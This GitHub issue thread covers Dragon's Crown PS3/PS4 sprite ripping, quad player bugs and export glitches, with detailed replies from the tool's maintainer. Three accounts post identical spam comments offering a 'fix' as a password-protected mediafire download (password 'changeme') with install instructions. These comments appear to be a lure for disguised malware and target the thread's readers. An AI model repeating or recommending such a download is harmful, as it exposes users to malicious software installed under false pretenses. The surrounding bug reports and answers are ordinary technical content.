### ISSUE TITLE
Further Dragons Crown reports

### ISSUE THREAD

**Issue by Gawidev** [rufaswan/Web2D_Games#21]
Hello again, I saw the last thread was getting spammed with sketchy phishing links so I know why it got locked, I'd have posted these in there but unfortunately I am not a contributor (*yet* 😉). I've got various reports about different topics, so I'll send them all in case some might be of value.

## Ripping
1. converting any ps4 .mbs file works, but also consistently prints:
     `PHP Warning:  PHP : unable to auto-detect ps4_odin , ps4_sent`.
      I found the source of the issue: psxtools/quad_vanillaware_FMBP_FMBS.php - line 1360 in function detect_tag( &$file )
      but couldn't investigate further since I cant seem to find the "str2int()" function.

2. converting any ps3 .mbs file works, but also consistently prints:
      `PHP Notice:  PHP : ps3_drag has no sb.txt`.

3. extraction procedure for "DRACRO/player/Amazon00.ftx" doesn't produce the necessary "Amazon00.1.gnf" in the ps4 version like it does in the ps3 one.
    - "Amazon00.1.gnf" should simply be a duplicate of "Amazon00_arms01.0.gnf", so you can just rename and use that instead.
    - extraction procedure for other player characters does produce their respective extra "character00.#.gnf" (all duplicates of their "character00_arms01.0.gnf").
    -  actually ive converted all of the ps4 files now and this is the only one that has an issue like this.

## Quadplayer
1. Web Browser limitations? quad player struggling with the massive files of the ps4 version.
     - Firefox loads with log claiming `["WebGL + highp init OK",["precision",23],["MAX_TEXTURE_SIZE",8192]]` but gets stuck attempting to load a 4096x texture (like for example the ps4 player character sprites). I know very little about webgl so I can't tell what kind of thing could be causing this.

2. Playing the Character Select screen (stage/T_ChrSelect00) or the Character Encounter (stage/E_*LocationName*00) screens, backgrounds vanish after a single frame. This makes me think that there might be some way that keyframes are marked as having an "infinite duration". I can't find something about this in the quad spec sheet but I might be missing it.
     - An example of this is at the bottom. 

3. One of the reports [about keyframe duration inconsistencies](https://github.com/rufaswan/Web2D_Games/issues/12#issuecomment-2041103586) mentioned in #12 is present for dragons crown as well, I haven't seen any of the other issues in that discussion yet though.

4. The elf's bow has incorrect texture coordinates in some keyframes but not others.

<p>
    <img height="400" src="https://files.catbox.moe/y85tn3.png">
    <img height="400" src="https://files.catbox.moe/bqvsd4.png">
    <img height="400" src="https://files.catbox.moe/vvk4df.png">
</p>

### Export Shenanigans
Some of these might be known issues due to the work-in-progress state of the tool so.
1. some animations are exported with issues relating to "canvas sizes".
     - **eg. A**: the camp cooking minigame potion flask "use" animation in Dragon's Crown ps3 and ps4 (stage/camp_a00 - animation "USE_ZRS"). Exported result cuts off the top half when exported in zip, and spritesheet export has later frames bleeding into the cells above (canvas size values bugged? maybe incorrect values in the original file since both ps3 and ps4 version cause the same issue?).
![000000](https://github.com/user-attachments/assets/8c6c563a-da64-4295-bf30-2458f984766a)
![camp_a00_mbs_v55_quad_skeleton_123_0 sheet](https://github.com/user-attachments/assets/7bf76db9-0944-492e-9cd2-092be34817cf)
          - Tangentially related suggestion for enhancement, appending the grid cell counts to the exported spritesheet filename would be very useful (eg: 34x3y).
     - **eg. B**: quite a few character animations are exported with empty spaces where no quads are even displayed.
![fireball](https://github.com/user-attachments/assets/013aba75-2884-43e0-a4ee-461825d248e3) ![Screenshot 2024-08-30 135547](https://github.com/user-attachments/assets/57d6e4a6-aae1-416b-b057-9d87453d2e85)
(*the empty space at the bottom of these animations were part of the export*)
![backstep](https://github.com/user-attachments/assets/bda05258-2dfd-4a95-ac03-33e9daf9a7bc) ![backstep line](https://github.com/user-attachments/assets/b1c6b3c5-882e-4963-b016-d5a7529ff27a)

2. using zoom values other than 1 when exporting sprite sheets results in them either being all bunched up on top of each other or completely spread out of frame.
![Owlbear00_mbs_v55_quad_skeleton_0_0 sheet](https://github.com/user-attachments/assets/98207b31-34f5-4391-ab10-3f73919fb39a)
![Owlbear00_mbs_v55_quad_skeleton_35_0 sheet](https://github.com/user-attachments/assets/6904e4cf-f6db-4a41-ba5f-ad4cbd429f5d)

6. many animations have 1 pixel-wide seams, or extra pixels appearing on the edge of fully transparent parts of a quad (the Amazon's axe often has this issue appear at the hilt of the weapon).
![Amazon00_mbs_v55_quad_skeleton_24_0](https://github.com/user-attachments/assets/2b2b4bfe-d096-4079-aecd-7995be808ca4)

7. exporting any of the Character Encounter screens only produces the first half of the animation (little Ricky here is supposed to jump back on his other leg).
![Ricky](https://files.catbox.moe/tenfpf.webp)
     - i would also recommend opening this image on a light-background and zooming in to see many examples of *export report 4*
     - specifying for clarity in regards to *quadplayer report 2*: the background layer vanishes after one frame, the afterglow that is still visible is just an overlaid set of quads used to simulate the glowing effect of the light and not related to the issue

# Conclusion
Right so that was a lot of stuff all at once, I guess more concretely I'm posting all of them so that if there are any worth turning into their own issues, I can do so. The only issue that is kind of stopping me from making more progress is the *quadplayer report 1* (about browser limitations), any information on if/what I can do about it would be appreciated. Hopefully some of these findings are useful in some way, I don't know much in terms of ripping files and examining hex values, but I do have some experience in developing games so if there was some kind of way in which I could contribute, consider me willing.

Also for something to check out, I found [this information](https://github.com/RPCS3/rpcs3/issues/4133#issuecomment-1894652434), it made me realize emulator developers could definitely be a good potential source of insight for as to how these games handle their blending and such. The info itself is also possibly a good lead on what could be done to resolve some of the issues for Dragons Crown specifically.

Either way, thanks again for the great tools, cheers.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rufaswan** [comment]
HUH? I though everyone who participated in the thread are all contributors, so I thought after kicking out those spam/bots, locking the thread means only you and I can post in there. This is to stop any random spammers from post anything. 

Man, I was considering locking other open threads too. That would be bad...

> converting any ps4 .mbs file works, but also consistently prints:
>    PHP Warning:  PHP : unable to auto-detect ps4_odin , ps4_sent.
>    I found the source of the issue: psxtools/quad_vanillaware_FMBP_FMBS.php - line 1360 in function detect_tag( &$file )
>    but couldn't investigate further since I cant seem to find the "str2int()" function.

Indeed. Both PS4 Odin Sphere Remake MBS and PS4 Dragon Crown MBS are the same structure and same version, so it cannot be auto-detected. It is a general error message to make sure it auto-detect as something other than `ps4_odin` and `ps4_sent`. It can be safely ignored.

`str2int()` is defined in `common.inc`. Like C/C++ std::string, in PHP you can read binary data as a string. `str2int()` is to unpack a part of the string into an int.

> converting any ps3 .mbs file works, but also consistently prints:
>    PHP Notice:  PHP : ps3_drag has no sb.txt.

Vanillaware MBS file is made up from a bunch of sections, so I label them s0, s1, s2, ..., s9, sa (= s10), sb (= s11).

Originally MBP/MBS file has only 11 sections (so from `s0` to `sa`), but since Odin Sphere Remake, Vanillaware added a new section (sb), and it seems to be animation related. I don't know how to read those data, nor I can run/debug those games.

That is also an error message to inform you are dealing with older MBS file. It too can be safely ignored.

> extraction procedure for "DRACRO/player/Amazon00.ftx" doesn't produce the necessary "Amazon00.1.gnf" in the ps4 version like it does in the ps3 one.
>   "Amazon00.1.gnf" should simply be a duplicate of "Amazon00_arms01.0.gnf", so you can just rename and use that instead.
>    extraction procedure for other player characters does produce their respective extra "character00.#.gnf" (all duplicates of their "character00_arms01.0.gnf").
>     actually ive converted all of the ps4 files now and this is the only one that has an issue like this.

I checked both FTX files, and you are correct. PS3 Amazon00.ftx has 2 files but PS4 has only 1 file. Perhaps it is removed since they are going to use "Amazon00_arms01.0.gnf" anyway.

> Web Browser limitations? quad player struggling with the massive files of the ps4 version.
>      Firefox loads with log claiming ["WebGL + highp init OK",["precision",23],["MAX_TEXTURE_SIZE",8192]] but gets stuck attempting to load a 4096x texture (like for example the ps4 player character sprites). I know very little about webgl so I can't tell what kind of thing could be causing this.

Yeah. I guess nobody is expecting someone to load 4K HD texture PNG over the internet, so WebGL isn't really designed for this kind of thing. And loading multiple 4K HD texture set PNG is just pushing the limits...

> Playing the Character Select screen (stage/T_ChrSelect00) or the Character Encounter (stage/E_LocationName00) screens, backgrounds vanish after a single frame. This makes me think that there might be some way that keyframes are marked as having an "infinite duration". I can't find something about this in the quad spec sheet but I might be missing it.
>        An example of this is at the bottom.

Probably, each animation track has `bitflags` to stop and loop each keyframe. But I don't think I saw anything that looks like "infinite duration" bitflag. This whole bitflags stuff are not very well understood.

> The elf's bow has incorrect texture coordinates in some keyframes but not others.

OOH! I was testing with Elf too, but from VITA. Never expect PS3 have this problem!

Comparing the VITA/PS4/PS3 textures... VITA and PS4 looks the same. Seems like PS3 has swizzling incorrectly or something. Need to do more checking.

> (the empty space at the bottom of these animations were part of the export)

Remember (0,0) is at the center of the sprite. It is how you align every frames back together.
It is also how you align every action/animation back together in-game. 

> many animations have 1 pixel-wide seams, or extra pixels appearing on the edge of fully transparent parts of a quad (the Amazon's axe often has this issue appear at the hilt of the weapon).

That would be the same precision issue here #17 

> Also for something to check out, I found https://github.com/RPCS3/rpcs3/issues/4133#issuecomment-1894652434, it made me realize emulator developers could definitely be a good potential source of insight for as to how these games handle their blending and such. The info itself is also possibly a good lead on what could be done to resolve some of the issues for Dragons Crown specifically.

Of course, I have been looking for official SDK documentation and referring emulator source code. This is how I managed to find PSX, PS2 and Wii blending formula:

https://www.vg-resource.com/thread-38430-post-675959.html#pid675959

> I don't know much in terms of ripping files and examining hex values, but I do have some experience in developing games so if there was some kind of way in which I could contribute, consider me willing.

Then I will take your offer - can you how many types of hitbox are they, how they are organized, and how do they connect actors/entities to each other, like a grab attack. I am researching how to connect head and body back together on PSP Grand Knight History.

Thanks!

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rufaswan** [comment]
> OOH! I was testing with Elf too, but from VITA. Never expect PS3 have this problem!
>
> Comparing the VITA/PS4/PS3 textures... VITA and PS4 looks the same. Seems like PS3 has swizzling incorrectly or something. Need to do more checking.

Checked multiple PS3 FTX with the same size, but there are no problem. So it is not swizzling error.

In fact, looking back at Amazon, I used Elf00.0.gtf.png (from Elf00.ftx) with Elf00_arms01.1.gtf.png (from Elf00_arms01.ftx , renamed .0. to .1.), the bow is correctly assembled. So it is like Amazon, Elf00.1.gtf.png is also not used.

In the end, there are nothing to fix on this.

**Comment by Gawidev** [comment]
Right, thanks so much for all the information, I guess there's a lot to unpack coming from the outside.
I didn't actually fully see the project thread so having read that now helps a good bit.
I'd have quite a few things I would like to clarify and make sure I understand but I'm getting the feeling that massive posts containing many different topics of different levels of relevance might not be the most convenient form of communication.
I spotted some users in the thread talking about contact through discord so if that's still a viable option it would work out well for me too.
> > OOH! I was testing with Elf too, but from VITA. Never expect PS3 have this problem!
> > Comparing the VITA/PS4/PS3 textures... VITA and PS4 looks the same. Seems like PS3 has swizzling incorrectly or something. Need to do more checking.
> 
> Checked multiple PS3 FTX with the same size, but there are no problem. So it is not swizzling error.
> 
> In fact, looking back at Amazon, I used Elf00.0.gtf.png (from Elf00.ftx) with Elf00_arms01.1.gtf.png (from Elf00_arms01.ftx , renamed .0. to .1.), the bow is correctly assembled. So it is like Amazon, Elf00.1.gtf.png is also not used.
> 
> In the end, there are nothing to fix on this.

Oh and yeah this would make sense, glad it wasn't any issue at least.
